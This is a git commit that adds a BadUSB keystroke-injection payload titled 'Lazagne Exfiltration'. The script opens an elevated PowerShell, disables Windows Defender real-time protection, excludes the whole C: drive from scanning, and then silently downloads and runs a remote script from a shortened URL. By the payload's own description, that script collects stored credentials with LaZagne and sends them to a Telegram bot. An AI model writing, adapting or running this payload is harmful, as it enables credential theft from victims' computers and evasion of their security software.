Create payload.txt

pull/410/head
Mr. Proxy 2023-12-18 02:00:14 +01:00 committed by GitHub
parent e6232e8209
commit e734499f3d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions

View File

@ -0,0 +1,14 @@
REM Title: Lazagne Exfiltration
REM Author: mrproxy
REM Requirements: Telegram bot, Internet Connection
REM Description: Downloads lazagne, runs lazagne, stores all info to .txt file, sends file to telegram bot.
REM Target: Windows
REM Version: 1.0
REM Category: Exfiltration
REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
GUI r
DELAY 500
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'"
CTRL-SHIFT ENTER
DELAY 1000
ALT y